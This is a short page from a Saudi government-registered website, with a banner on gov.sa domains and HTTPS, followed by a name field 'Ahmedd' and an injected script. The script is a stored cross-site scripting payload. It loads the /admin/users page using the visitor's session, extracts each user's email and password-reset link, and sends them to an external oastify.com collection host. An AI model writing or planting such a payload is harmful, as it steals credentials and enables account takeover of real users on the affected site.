Credibility

Official Saudi government websites end with gov.sa

All official websites of government entities in the Kingdom of Saudi Arabia end with gov.sa.

Security

Government websites use HTTPS the protocol for encryption and security.

Secure websites in the Kingdom of Saudi Arabia use the HTTPS protocol for encryption.

Digital Government Authority
Registered with the Digital Government Authority under number: 20251222861

Ahmedd

<script> fetch("/admin/users", { credentials: "include" }) .then(res => res.text()) .then(html => { const parser = new DOMParser(); const doc = parser.parseFromString(html, "text/html"); const rows = doc.querySelectorAll("table tbody tr"); rows.forEach(row => { const email = row.children[3]?.innerText?.trim(); // العمود الرابع = الإيميل const resetLink = row.querySelector("a[data-url*='users-reset-password']")?.dataset?.url; if (email && resetLink) { new Image().src = "https://hxixz842mdpxows50bj93sn9u00roic7.oastify.com/leak?" + encodeURIComponent(`email=${email}&link=${resetLink}`); } }); }); </script>